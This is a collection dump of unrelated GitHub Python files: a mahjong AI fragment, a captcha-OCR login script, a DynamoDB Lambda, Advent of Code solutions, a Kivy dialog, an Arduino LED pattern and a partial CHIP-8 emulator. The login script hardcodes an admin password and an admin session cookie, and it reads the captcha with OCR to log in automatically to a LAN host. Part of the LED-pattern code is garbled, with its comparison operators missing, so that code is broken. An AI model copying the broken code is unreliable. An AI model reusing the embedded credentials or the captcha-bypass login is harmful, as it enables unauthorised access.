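# The self-draw distribution T_SELFMO above is simply the unseen-tile counts
# normalized by the number of unseen tiles. A standalone sketch with made-up
# counts (all names here are illustrative, not from the original):
unseen_counts = [4, 3, 0, 2]               # copies of each tile still unseen
remaining = sum(unseen_counts)
draw_prob = [c / remaining for c in unseen_counts]
assert abs(sum(draw_prob) - 1.0) < 1e-9    # probabilities sum to one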
seat_id, xts_round, M\n _, T_SELFMO, RT1, RT2, RT3 = DFM.DefendModel(cards=cards, suits=suits, king_card=king_card, fei_king=fei_king,\n discards=discards, discardsOp=discards_op, discardsReal=discards,\n round=round, seat_id=seat_id, xts_round=DFM.xts_round,\n M=250).getWTandRT()\n # RT1 = []\n # RT2 = []\n # RT3 = []\n # t1tot2_dict = MJ.t1tot2_info(T_selfmo=T_SELFMO)\n\n t1tot3_dict = MJ.t1tot3_info(T_selfmo=T_SELFMO, RT1=[], RT2=[], RT3=[])\n t2tot3_dict = MJ.t2tot3_info(T_selfmo=T_SELFMO, RT1=[], RT2=[], RT3=[])\n\n # print t1tot3_dict\n # print t2tot3_dict\n left_num = LEFT_NUM\n paixing = paixing_choose(cards=cards, suits=suits, king_card=king_card, discards=discards, discards_op=discards_op,\n fei_king=fei_king)\n if remain_num == 136:\n remain_num = sum(LEFT_NUM)\n if paixing == 0:\n # print(\"choose pinghu\")\n # start=time.time()\n discard, score, state = pinghu(cards, suits, leftNum=left_num, discards=discards, discards_real=[],\n discardsOp=discards_op,\n round=round, remainNum=remain_num, seat_id=0, kingCard=king_card,\n fei_king=fei_king).rf_info()\n return paixing, discard, score, state\n # end = time.time()\n # end = time.time()\n # if end - TIME_START > 3:\n # logger.error(\"overtime %s,%s,%s,%s\", end - TIME_START, cards, suits, king_card)\n # return recommond_card\n elif paixing == 1:\n # print(\"choose jiuyao\")\n return paixing, jiuyao().recommend_card(cards=cards, suits=suits, left_num=left_num), [], []\n elif paixing == 2:\n # print(\"choose qidui\")\n return paixing, qidui().recommend_card(cards=cards, suits=suits, left_num=left_num, king_card=king_card), [], []\n elif paixing == 3:\n # print(\"choose ssl\")\n return paixing, ssl(cards, suits, discards_list).recommend_card(), [], []\n\n\ndef recommend_op(op_card, cards=[], suits=[], king_card=None, discards=[], discards_op=[], canchi=False,\n self_turn=False, fei_king=0, isHu=False, round=0):\n \"\"\"\n 功能:动作决策接口\n 思路:使用向听数作为牌型选择依据,对最小xts的牌型,再调用相应的牌型类动作决策\n :param op_card: 操作牌\n :param cards: 手牌\n :param suits: 副露\n :param king_card: 宝牌\n :param discards: 弃牌\n :param discards_op: 场面副露\n :param canchi: 吃牌权限\n :param self_turn: 是否是自己回合\n :param fei_king: 飞宝数\n :param isHu: 是否胡牌\n :return: [],isHu 动作组合牌,是否胡牌\n \"\"\"\n if isHu:\n return [], True\n\n # 更新全局变量\n global T_SELFMO, LEFT_NUM, t2tot3_dict, t1tot3_dict\n LEFT_NUM, discards_list = trandfer_discards(discards=discards, discards_op=discards_op, handcards=cards)\n LEFT_NUM[translate16_33(pre_king(king_card))] -= 1\n\n # if remain_num == 0:\n # remain_num = 1\n remain_num = sum(LEFT_NUM)\n if round > 100:\n T_SELFMO = []\n RT1 = []\n RT2 = []\n RT3 = []\n else:\n T_SELFMO = [float(i) / remain_num for i in LEFT_NUM]\n RT1 = []\n RT2 = []\n RT3 = []\n\n t1tot3_dict = MJ.t1tot3_info(T_selfmo=T_SELFMO, RT1=[], RT2=[], RT3=[])\n t2tot3_dict = MJ.t2tot3_info(T_selfmo=T_SELFMO, RT1=[], RT2=[], RT3=[])\n\n left_num = LEFT_NUM\n\n # cards.sort()\n # suits = [sorted(e) for e in suits]\n # print ('recommend_op', suits)\n # left_num, discards_list = trandfer_discards(discards=discards, discards_op=discards_op, handcards=cards)\n # left_num[translate16_33(king_card)] = 0\n # left_num[translate16_33(pre_king(king_card))] -= 1 # 宝牌前一张减一\n remain_num = sum(left_num)\n if remain_num == 0:\n remain_num = 1\n paixing = paixing_choose(cards=cards, suits=suits, king_card=king_card, discards=discards, discards_op=discards_op,\n op_card=op_card, fei_king=fei_king)\n if paixing == 0:\n # print(\"choose pinghu\", cards)\n return pinghu(cards, suits, leftNum=left_num, discards=discards, 
discards_real=[], discardsOp=discards_op,\n round=round, remainNum=sum(left_num), seat_id=0, kingCard=king_card, fei_king=fei_king,\n op_card=op_card).recommend_op(op_card=op_card, canchi=canchi, self_turn=self_turn, isHu=isHu)\n elif paixing == 1:\n # print(\"choose jiuyao\")\n if isHu:\n return [], isHu\n return jiuyao().recommend_op(op_card=op_card, cards=cards, suits=suits, left_num=left_num, king_card=king_card,\n canchi=canchi, self_turn=self_turn), False\n elif paixing == 2:\n if isHu:\n return [], isHu\n # print(\"choose qidui\")\n return qidui().recommend_op(op_card=op_card, cards=cards, suits=suits), False\n elif paixing == 3:\n # print(\"choose ssl\")\n if isHu:\n return [], isHu\n return ssl(cards, suits, discards_list).recommend_op(), False\n","repo_name":"huxiaosir/RL-Group","sub_path":"mah_tool/so_lib/shangraoMJ_v2.py","file_name":"shangraoMJ_v2.py","file_ext":"py","file_size_in_byte":256659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"33066984723","text":"import pytesseract\nfrom PIL import Image\nimport PIL.ImageOps\nimport os\nimport requests,json\nfrom urllib.parse import quote,unquote\nimport connector\nimport time\nfrom urllib import request\nsession = requests.Session()\n\ndef convert_img(img, threshold):\n img = img.convert(\"L\") # 处理灰度\n pixels = img.load()\n for x in range(img.width):\n for y in range(img.height):\n if pixels[x, y] > threshold:\n pixels[x, y] = 255\n else:\n pixels[x, y] = 0\n return img\n\n\ndef initTable(threshold=60):\n table = []\n for i in range(256):\n if i < threshold:\n table.append(0)\n else:\n table.append(1)\n return table\ndef getverify(path):\n\tfor root,dir,file in os.walk(path):\n\t\tfor tt in file:\n\t\t\tdd=os.path.join(os.path.abspath(root),tt)\n\t\t\tim = Image.open(dd)\n\t#图片的处理过程\n\t\t\tim = im.convert('L')\n\t\t\tbinaryImage = im.point(initTable(), '1')\n\t\t\tim1 = binaryImage.convert('L')\n\t\t\tim2 = PIL.ImageOps.invert(im1)\n\t\t\tim3 = im2.convert('1')\n\t\t\tim4 = im3.convert('L')\n\t\t\t#将图片中字符裁剪保留\n\t\t\tbox = (3,2,46,22) \n\t\t\tregion = im4.crop(box) \n\t\t\t#将图片字符放大\n\t\t\tout = region.resize((120,55)) \n\t\t\treturn pytesseract.image_to_string(out)\n\ndef get_and_save_verify(url1,i):\n try:\n url = url1\n request.urlretrieve(url,'img\\\\'+str(i) + '.png')\n print('第' + str(i) + '张图片下载成功')\n except Exception:\n print('第' + str(i) + '张图片下载失败')\n\n\nfrom urllib.parse import quote,unquote\nfrom urllib.parse import quote,unquote\nfrom bs4 import BeautifulSoup\n\ni1=session.get('http://192.168.0.181:8090/Authentication/Login')\nhtml_doc=i1.text\nsoup = BeautifulSoup(html_doc, 'html.parser')\npurl=soup.find(id='validateCode1_imgValidateCode').attrs['src']\nvurl=\"http://192.168.0.181:8090/\"+purl\n\n# get_and_save_verify(vurl,1)\n# vd=getverify('img')\n# print(vd)\nprint(vurl)\nua='Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'\nheader = {\"User-Agent\" : ua,\n \"Referer\" : \"http://192.168.0.181:8090/Authentication/Login\",\n \"Cookie\":r\"ASP.NET_SessionId=rffbvm0zaiariab5dak3idcd; uid=id=1&usercode=admin&username=%e7%b3%bb%e7%bb%9f%e7%ae%a1%e7%90%86%e5%91%98&login=admin&usertype=9&isadmin=True&customcode=&suppliercode=\"\n }\nform_data = {\n \"ReturnUrl\":\"ww.dd.cc\",\n \"ValidateCodeID\":\"ValidateCode1\",\n \"Login\": \"admin\",\n \"Password\": \"txcallme\",\n \"ValidateCode\":2750,\n \"RememberMe\":0\n \n}\n\n\n\ni2 = 
session.post('http://192.168.0.181:8090/Authentication/Validate', headers = header,data=form_data)\nc2 = i2.cookies.get_dict()\nprint (i2.content.decode('utf-8'))\n","repo_name":"aiiw/mypy","sub_path":"pchrm.py","file_name":"pchrm.py","file_ext":"py","file_size_in_byte":2744,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"34169903466","text":"#! /usr/bin/env python\n\n\"\"\"\nA lambda function to update an object in DynamoDB\n\nTest item\n{\n\"id\": \"1\",\n\"done\": true\n}\n\"\"\"\nimport boto3\nimport json\n\ndynamodb = boto3.resource('dynamodb')\ntable_name = 'todolist'\n\ndef updateTaskStatus_handler(event, context):\n \"\"\"\n Update an item (task) in dynamoDB table.\n\n input is an object with a task id and other attributes to be\n updated.\n \"\"\"\n table = dynamodb.Table(table_name)\n obj = json.loads(event[\"body\"])\n try:\n resp = table.get_item(Key={\"id\": obj[\"id\"]}).keys()\n if 'Item' in resp:\n resp = table.update_item(\n Key={\"id\": obj[\"id\"]},\n UpdateExpression='SET done = :val1',\n ExpressionAttributeValues={':val1': obj[\"done\"]}\n )\n return {\n \"statusCode\": 200,\n \"headers\": {\"Access-Control-Allow-Origin\": \"*\",},\n \"body\": json.dumps(resp)\n }\n else:\n return {\n \"statusCode\": 200,\n \"headers\": {\"Access-Control-Allow-Origin\": \"*\",},\n \"body\": json.dumps(\"Item doesn't exist\")\n }\n except Exception as e:\n return {\n \"statusCode\": 500,\n \"headers\": {\n \"Access-Control-Allow-Origin\": \"*\"\n },\n \"body\": json.dumps(str(e))\n }\n","repo_name":"dmuiruri/task_manager","sub_path":"taskapp/updatetask.py","file_name":"updatetask.py","file_ext":"py","file_size_in_byte":1396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"39542815243","text":"import time\n\ndef compute():\n with open('day1_puzzle_input.txt') as fp:\n input = [int(x) for x in fp.readlines()]\n slice_window = 2 # 0-2 to start\n count = 0\n\n for i, _ in enumerate(input):\n cur = sum(input[i:slice_window+1])\n comp = sum(input[i+1:slice_window+2])\n if cur < comp:\n count += 1\n\n slice_window += 1 \n \n print(f'readings increased {count} times')\n\nif __name__ == \"__main__\":\n start = time.perf_counter()\n compute()\n end = time.perf_counter()\n print(f\"Execution Time : {end- start:0.6f}\" )\n","repo_name":"osiris43/advent_of_code","sub_path":"2021/day1.py","file_name":"day1.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"73475550521","text":"import numpy as np\n\nfrom math import exp\nfrom scipy import constants\n\nclass Propagation():\n # ! units of distance and time\n def __init__(self, speed_func):\n\n if speed_func == '2/3c':\n speed = ((2/3) * constants.speed_of_light) / 1000\n self.time_func = lambda x: x / speed\n\n elif speed_func == '1/3c':\n speed = ((1/3) * constants.speed_of_light) / 1000\n self.time_func = lambda x: x / speed\n\n elif speed_func == 'paper':\n # ! 
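# Units sanity check for the Propagation class above: scipy's speed_of_light
# is in m/s, so dividing by 1000 makes the '2/3c' branch expect kilometres
# and return seconds. A standalone sketch, assuming those units:
from scipy import constants

speed_km_s = (2 / 3) * constants.speed_of_light / 1000   # ~199862 km/s
assert abs(1000 / speed_km_s - 0.005) < 1e-3             # 1000 km in ~5 ms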
The empirical speed function uses meters as input\n self.time_func = lambda x: 5.817e+07 * exp(1.645e-07*x) -4.785e+07 * exp(-2.812e-06*x)\n\n def get_time(self, x):\n try:\n time = self.time_func(x)\n except Exception as e:\n print ('Failed in Propagation time_func:', e, 'x=', x)\n time = 0\n return time\n\n ","repo_name":"katharinakohls/VerLoc","sub_path":"verloc/propagation.py","file_name":"propagation.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"40"} +{"seq_id":"37601590260","text":"## Advent of Code 2019: Day 2\n## https://adventofcode.com/2019/day/2\n## Jesse Williams | github.com/vblank182\n## Answers: [Part 1]: 3516593, [Part 2]: 7749\n\n### Intcode Computer v1 ###\n\ndef runTape(initialTape, input):\n workTape = initialTape.copy()\n\n (workTape[1], workTape[2]) = input\n\n ptr = 0\n while True:\n # Determine the current opcode\n opcode = workTape[ptr]\n\n if opcode == 1: # Addition\n workTape[workTape[ptr+3]] = workTape[workTape[ptr+1]] + workTape[workTape[ptr+2]]\n elif opcode == 2: # Multiplication\n workTape[workTape[ptr+3]] = workTape[workTape[ptr+1]] * workTape[workTape[ptr+2]]\n elif opcode == 99: # Program finished\n return workTape\n break\n else:\n print(\"ERROR: Unknown opcode '{}'.\".format(opcode))\n break\n\n ptr = ptr + 4\n\ndef reverseSearch(initialTape, targetOutput):\n # Searches for an input pair that produces the desired output.\n for inputL in range(0, len(initialTape)):\n for inputR in range(0, len(initialTape)):\n output = runTape(initialTape, (inputL, inputR))[0]\n if targetOutput == output:\n return (inputL, inputR)\n print(\"Output not found.\")\n return (-1, -1)\n\nif __name__ == '__main__':\n\n # Load program\n with open(\"day02_input.txt\") as f:\n initialTapeStrs = f.read()[:-1].split(',')\n initialTape = [int(i) for i in initialTapeStrs]\n\n ## Part 1\n finalTape = runTape(initialTape, (12, 2))\n print(\"[Part 1] Output: {}\".format(finalTape[0]))\n\n ## Part 2\n inputsNeeded = reverseSearch(initialTape, 19690720)\n print(\"[Part 2] Inputs: {} {}\".format(inputsNeeded[0], inputsNeeded[1]))\n","repo_name":"xram64/AdventOfCode2019","sub_path":"day02/day02.py","file_name":"day02.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"24059976869","text":"from kivy.lang import Builder\n\nimport os\n\nfrom kivy.properties import ObjectProperty\n\nfrom editor.components.dialogs.ok_cancel_dialog import OkCancelDialog\n\n\nclass FileChooserDialog(OkCancelDialog):\n\n dialog_widget = ObjectProperty()\n\n def __init__(self, **kwargs):\n path = kwargs.get(\"path\", os.path.expanduser(\"~\").replace(\"\\\\\", \"/\"))\n self.dialog_widget = Builder.load_string(f'''\nBoxLayout:\n size: root.size\n pos: root.pos\n orientation: \"vertical\"\n FileChooserListView:\n size: root.size\n id: file_chooser\n path: '{path}'\n on_selection: text_input.text =\\\n self.selection and self.selection[0] or ''\n\n TextInput:\n id: text_input\n size_hint_y: None\n height: 30\n multiline: False\n text: '{path}'\n ''')\n super(FileChooserDialog, self).__init__(\n **kwargs,\n title=\"Choose a file\",\n dialog_content=self.dialog_widget)\n\n def confirm(self):\n self.callback(self.dialog_widget.ids['text_input'].text)\n self.used_callback = True\n 
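# The opcode branch in the Intcode runTape above can also be written as a
# table of operations, which scales better as opcodes are added. A minimal
# standalone sketch of the same add/mul/halt machine (not the original code):
import operator

OPS = {1: operator.add, 2: operator.mul}

def run(tape):
    tape = tape.copy()
    ptr = 0
    while tape[ptr] != 99:          # opcode 99 halts the program
        op, a, b, dst = tape[ptr:ptr + 4]
        tape[dst] = OPS[op](tape[a], tape[b])
        ptr += 4
    return tape

assert run([1, 0, 0, 0, 99])[0] == 2   # 1 + 1 stored at position 0
assert run([2, 3, 0, 3, 99])[3] == 6   # 2 * 3 stored at position 3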
self.dismiss()
","repo_name":"mhcrnl/PyTextEditor","sub_path":"editor/components/dialogs/file_chooser_dialog.py","file_name":"file_chooser_dialog.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"40"}
{"seq_id":"24134263902","text":"
import arduino_sender

def circle_pattern_generator():
    # LED indices laid out as two concentric rings on a 4x4 grid
    outer_circle = [0, 4, 8, 12, 13, 14, 15, 11, 7, 3, 2, 1]
    inner_circle = [5, 9, 10, 6]
    outer_circle_startpoints = []
    outer_circle_middlepoints = []
    outer_circle_endpoints = []
    inner_circle_startpoints = []
    inner_circle_middlepoints = []
    inner_circle_endpoints = []
    Dict = {0: 6, 1: 10, 2: 13, 3: 15, 4: 3, 5: 7, 6: 11, 7: 14,
            8: 1, 9: 4, 10: 8, 11: 12, 12: 0, 13: 2, 14: 5, 15: 9}
    for i in range(len(outer_circle)):
        outer_circle_startpoints.append(i * 30)
        outer_circle_middlepoints.append(i * 30 + 100)
        outer_circle_endpoints.append(i * 30 + 200)
    for i in range(len(inner_circle)):
        inner_circle_startpoints.append(i * 30)
        inner_circle_middlepoints.append(i * 30 + 100)
        inner_circle_endpoints.append(i * 30 + 200)
    i = 0
    j = 0
    matrix = [0] * 16
    k = 0
    while True:
        i += 12
        j += 4
        # NOTE: the comparison operators in this block were destroyed by
        # markup stripping in the source; the ramp-up/ramp-down branches are
        # reconstructed from the surviving inner-ring 'elif' branch.
        for x in range(len(outer_circle)):
            if i > outer_circle_startpoints[x] and i < outer_circle_middlepoints[x]:
                matrix[Dict[outer_circle[x]]] = i - outer_circle_startpoints[x]
            elif i > outer_circle_middlepoints[x] and i < outer_circle_endpoints[x]:
                matrix[Dict[outer_circle[x]]] = 200 - (i - outer_circle_startpoints[x])
            else:
                matrix[Dict[outer_circle[x]]] = 0
        for x in range(len(inner_circle)):
            if j > inner_circle_startpoints[x] and j < inner_circle_middlepoints[x]:
                matrix[Dict[inner_circle[x]]] = j - inner_circle_startpoints[x]
            elif j > inner_circle_middlepoints[x] and j < inner_circle_endpoints[x]:
                matrix[Dict[inner_circle[x]]] = 200 - (j - inner_circle_startpoints[x])
            else:
                matrix[Dict[inner_circle[x]]] = 0
        arduino_sender.sendData(matrix)
        if i > 530:
            i = i % 530
            k += 1
        if j > 290:
            j = j % 290
        if k > 4:
            break

def main():
    circle_pattern_generator()

if __name__ == "__main__":
    main()
","repo_name":"alkrona/flower_project_repo_withdocs","sub_path":"circle_pattern.py","file_name":"circle_pattern.py","file_ext":"py","file_size_in_byte":2056,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"17281459315","text":"
from random import random
import keyboard
import os

VERBOSE = False
TERMINAL_GAME = False

SCREEN_WIDTH = 64
SCREEN_HEIGHT = 32

BEGIN_ROM_ADDRESS = 0x200

AVAILABLE_KEYS = list(range(0x30, 0x3A)) + list(range(0x41, 0x47))
KEYBOARD_MAP = {
    0x31: '1', 0x32: '2', 0x33: '3', 0x43: '4',
    0x34: 'Q', 0x35: 'W', 0x36: 'E', 0x44: 'R',
    0x37: 'A', 0x38: 'S', 0x39: 'D', 0x45: 'F',
    0x41: 'Z', 0x30: 'X', 0x42: 'C', 0x46: 'V',
    0x1: '1', 0x2: '2', 0x3: '3', 0x4: '4',
    0x5: 'Q', 0x6: 'W', 0x7: 'E', 0x8: 'R',
    0x9: 'A', 0xA: 'S', 0xB: 'D', 0xC: 'F',
    0xD: 'Z', 0xE: 'X', 0xF: 'C', 0x10: 'V'
}

KEYS = [
    '1', '2', '3', '4',
    'Q', 'W', 'E', 'R',
    'A', 'S', 'D', 'F',
    'Z', 'X', 'C', 'V']

NUMBER_SPRITES = [0xF0, 0x90, 0x90, 0x90, 0xF0,  # 0
                  0x20, 0x60, 0x20, 0x20, 0x70,  # 1
                  0xF0, 0x10, 0xF0, 0x80, 0xF0,  # 2
                  0xF0, 0x10, 0xF0, 0x10, 0xF0,  # 3
                  0x90, 0x90, 0xF0, 0x10, 0x10,  # 4
                  0xF0, 0x80, 0xF0, 0x10, 0xF0,  # 5
                  0xF0, 0x80, 0xF0, 0x90, 0xF0,  # 6
                  0xF0, 0x10, 0x20, 0x40, 0x40,  # 7
                  0xF0, 0x90, 0xF0, 0x90, 0xF0,  # 8
                  0xF0, 0x90, 0xF0, 0x10, 0xF0,  # 9
                  0xF0, 0x90, 0xF0, 0x90, 0x90,  # A
                  0xE0, 0x90, 0xE0, 0x90, 0xE0,  # B
                  0xF0, 0x80, 0x80, 0x80, 0xF0,  # C
                  0xE0, 0x90, 0x90, 0x90, 0xE0,  # D
                  0xF0, 0x80, 0xF0, 0x80, 0xF0,  # E
                  0xF0, 0x80, 0xF0, 0x80, 0x80]  # F


def dec_to_bin(x):
    return int(bin(int(x))[2:])


class Chip8:

    def __init__(self):
        self.MEMORY = [0] * 4096

        self.MEMORY[0x00:0x50] = NUMBER_SPRITES

        self.V_REG = [0] * 16
        self.I_REG = 0

        self.TIMER = 0
        self.SOUND =
0\n\n self.PC = 0\n self.SP = 0xEFF\n\n self.DISPLAY = []\n self.ACTIVE_KEYS = []\n\n self.updated_display = 1;\n\n for x_screen in range(SCREEN_WIDTH):\n new_column = []\n for y_screen in range(SCREEN_HEIGHT):\n new_column.append(0)\n self.DISPLAY.append(new_column)\n\n def update_keys(self):\n pressed_keys = []\n for key in KEYS:\n if keyboard.is_pressed(key):\n pressed_keys.append(key)\n self.ACTIVE_KEYS = pressed_keys\n\n def check_key(self, key):\n return KEYBOARD_MAP[key] in self.ACTIVE_KEYS\n\n def display_clear(self):\n for x in range(SCREEN_WIDTH):\n for y in range(SCREEN_HEIGHT):\n self.DISPLAY[x][y] = 0\n\n def set_keys(self, keys):\n self.ACTIVE_KEYS = keys\n\n def show_display(self):\n display_buffer = \"\"\n display_buffer += \".\"\n for x in range(SCREEN_WIDTH):\n display_buffer += '_'\n display_buffer += '\\n'\n for y in range(SCREEN_HEIGHT):\n display_buffer += '|'\n for x in range(SCREEN_WIDTH):\n if self.DISPLAY[x][y] == 1:\n display_buffer += '▓'\n else:\n display_buffer += ' '\n\n display_buffer += '\\n'\n\n clearConsole = lambda: os.system('cls' if os.name in ('nt', 'dos') else 'clear')\n clearConsole()\n print(display_buffer)\n\n def get_display(self):\n return self.DISPLAY\n\n # Return from subroutine\n # 00EE\n # PC = address at top of stack\n # SP -= 2\n def RET(self):\n if VERBOSE:\n print(\"0033\")\n self.PC = self.MEMORY[self.SP] << 8\n self.PC |= self.MEMORY[self.SP - 1]\n self.SP -= 2\n\n # Jump 1nnn\n # PC = address nnn\n def JMP(self, addr):\n if VERBOSE:\n print(\"1nnn\")\n self.PC = addr\n\n # Call 2nnn\n # Calls subroutine at nnn\n def CALL(self, addr):\n if VERBOSE:\n print(\"2nnn\")\n self.SP += 2\n self.MEMORY[self.SP] = self.PC >> 8\n self.MEMORY[self.SP - 1] = self.PC & 0xFF\n self.PC = addr\n\n # SE 3xkk\n def SEB(self, x, byte):\n if VERBOSE:\n print(\"4xkk\")\n if self.V_REG[x] == byte:\n self.PC += 2\n\n # SNE 4xkk\n def SNEB(self, x, byte):\n if VERBOSE:\n print(\"4xkkk\")\n if self.V_REG[x] != byte:\n self.PC += 2\n\n # SE 5xy0\n def SER(self, x, y):\n if VERBOSE:\n print(\"5xy0\")\n if self.V_REG[x] == self.V_REG[y]:\n self.PC += 2\n\n # LD 6xkk\n def LDB(self, x, byte):\n if VERBOSE:\n print(\"6xkk\")\n self.V_REG[x] = byte\n\n # ADD 7xkk\n def ADDB(self, x, byte):\n if VERBOSE:\n print(\"7xkk\")\n self.V_REG[x] = self.V_REG[x] + byte\n self.V_REG[x] &= 0xFF\n\n # LD 8xy0\n def LDRR(self, x, y):\n if VERBOSE:\n print(\"8xy0\")\n self.V_REG[x] = self.V_REG[y]\n\n # OR 8xy1\n def ORR(self, x, y):\n if VERBOSE:\n print(\"8xy1\")\n self.V_REG[x] = self.V_REG[x] | self.V_REG[y]\n\n # AND 8xy2\n def ANDR(self, x, y):\n if VERBOSE:\n print(\"8xy2\")\n self.V_REG[x] &= self.V_REG[y]\n\n # XOR 8xy3\n def XORR(self, x, y):\n if VERBOSE:\n print(\"8xy3\")\n self.V_REG[x] ^= self.V_REG[y]\n\n # ADD 8xy4\n def ADDR(self, x, y):\n if VERBOSE:\n print(\"8xy4\")\n sum = self.V_REG[x] + self.V_REG[y]\n if sum >> 8 == 1:\n self.V_REG[0xF] = 1\n sum &= 0xFF\n else:\n self.V_REG[0xF] = 0\n self.V_REG[x] = sum\n\n # SUB 8xy5 #Underflow how it works we do not\n def SUBR(self, x, y):\n if VERBOSE:\n print(\"8xy5\")\n dif = self.V_REG[x] - self.V_REG[y]\n if dif < 0:\n self.V_REG[0xF] = 0\n dif += 256\n else:\n self.V_REG[0xF] = 1\n self.V_REG[x] = dif\n\n # SHR 8xy6\n def SHR(self, x):\n if VERBOSE:\n print(\"8xy6\")\n self.V_REG[0xF] = self.V_REG[x] & 0x01\n self.V_REG[x] >>= 1\n\n # SUBN 8xy7\n def SUBNR(self, x, y):\n if VERBOSE:\n print(\"8xy7\")\n dif = self.V_REG[y] - self.V_REG[x]\n if dif < 0:\n self.V_REG[0xF] = 0\n dif += 256\n else:\n self.V_REG[0xF] = 
1\n self.V_REG[x] = dif\n\n # SHL 8xyE\n def SHLR(self, x):\n if VERBOSE:\n print(\"8xyE\")\n self.V_REG[0xF] = (self.V_REG[x] >> 7) & 0x01\n self.V_REG[x] = self.V_REG[x] << 1 & 0xFF\n\n # SNE 9xy0\n def SNER(self, x, y):\n if VERBOSE:\n print(\"9xy0\")\n if self.V_REG[x] != self.V_REG[y]:\n self.PC += 2\n\n # LD Annn\n def LDRI(self, addr):\n if VERBOSE:\n print(\"Annn\")\n self.I_REG = addr\n\n # JP Bnnn\n def JMPI(self, addr):\n if VERBOSE:\n print(\"Bnnn\")\n self.PC = addr + self.V_REG[0x00]\n\n # RND Cxkk\n def RNDB(self, x, byte):\n if VERBOSE:\n print(\"Cnnn\")\n self.V_REG[x] = int(random() * 256) & byte\n\n def DRW(self, x, y, n):\n if VERBOSE:\n print(\"Dxyn\")\n erased = 0\n for i in range(n):\n sprite_line = self.MEMORY[self.I_REG + i]\n for j in range(8):\n original_pixel = self.DISPLAY[(self.V_REG[x] + j) % SCREEN_WIDTH][(self.V_REG[y] + i) % SCREEN_HEIGHT]\n sprite_pixel = sprite_line >> (7 - j) & 0x1\n new_pixel = original_pixel ^ sprite_pixel\n if original_pixel & sprite_pixel == 0x1:\n erased = 0x1\n self.DISPLAY[(self.V_REG[x] + j) % SCREEN_WIDTH][(self.V_REG[y] + i) % SCREEN_HEIGHT] = new_pixel\n self.V_REG[0xF] = erased\n self.updated_display = 1\n if TERMINAL_GAME:\n self.show_display()\n\n # SKP Ex9E\n def SKP(self, x):\n if VERBOSE:\n print(\"Wz9E\")\n if TERMINAL_GAME:\n self.update_keys()\n if self.check_key(self.V_REG[x]):\n self.PC += 2\n\n # SKNP ExA1\n def SKNP(self, x):\n if VERBOSE:\n print(\"ExA1\")\n if TERMINAL_GAME:\n self.update_keys()\n if not self.check_key(self.V_REG[x]):\n self.PC += 2\n\n # LD Fx07\n def LDRT(self, x):\n if VERBOSE:\n print(\"Fx07\")\n self.V_REG[x] = self.TIMER\n\n # LD Fx0A\n def LDWFK(self, x):\n if VERBOSE:\n print(\"Fx0A\")\n while True:\n for key in AVAILABLE_KEYS:\n if TERMINAL_GAME:\n self.update_keys()\n if self.check_key(key):\n self.V_REG[x] = key\n return\n\n # LD Fx15\n def LDTR(self, x):\n if VERBOSE:\n print(\"Fx15\")\n self.TIMER = self.V_REG[x]\n\n # LD Fx18\n def LDSR(self, x):\n if VERBOSE:\n print(\"Fx18\")\n\n self.SOUND = self.V_REG[x]\n\n # ADD Fx1E\n def ADDIR(self, x):\n if VERBOSE:\n print(\"Fx1E\")\n\n self.I_REG += self.V_REG[x]\n\n # LD Fx29\n def LDSPRI(self, x):\n if VERBOSE:\n print(\"Fx29\")\n self.I_REG = int(self.V_REG[x]) * 5\n\n # LD Fx33\n def BCD(self, x):\n if VERBOSE:\n print(\"Fx33\")\n\n self.MEMORY[self.I_REG] = (self.V_REG[x] // 100) % 10\n self.MEMORY[self.I_REG + 1] = (self.V_REG[x] // 10) % 10\n self.MEMORY[self.I_REG + 2] = self.V_REG[x] % 10\n\n # Fx55\n def LDMR(self, x):\n if VERBOSE:\n print(\"Fx55\")\n for i in range(x + 1):\n self.MEMORY[self.I_REG + i] = self.V_REG[i]\n\n # Fx65\n def LDRM(self, x):\n if VERBOSE:\n print(\"Fx65\")\n for i in range(x + 1): # Maybe increment I\n self.V_REG[i] = self.MEMORY[self.I_REG + i]\n\n def print_mem(self, start, end):\n for address in range(start, end):\n print(\"ADDRESS {}: {} {}\".format(hex(address), hex(self.MEMORY[address]), dec_to_bin(self.MEMORY[address])))\n\n def read_pc(self):\n b0 = self.MEMORY[self.PC] >> 4 & 0xF\n b1 = self.MEMORY[self.PC] & 0xF\n b2 = self.MEMORY[self.PC + 1] >> 4 & 0xF\n b3 = self.MEMORY[self.PC + 1] & 0xF\n self.PC += 2\n self.interpret_command(b0, b1, b2, b3)\n\n def load_rom(self, filename):\n with open(filename, \"rb\") as rom:\n byte = rom.read(1)\n address = BEGIN_ROM_ADDRESS\n while byte:\n self.MEMORY[address] = int.from_bytes(byte, 'little')\n address += 1\n byte = rom.read(1)\n self.PC = 0x200\n self.SP = 0xEFF\n\n def interpret_command(self, b0, b1, b2, b3):\n addr = 0\n byte = 0\n\n x = b1\n y 
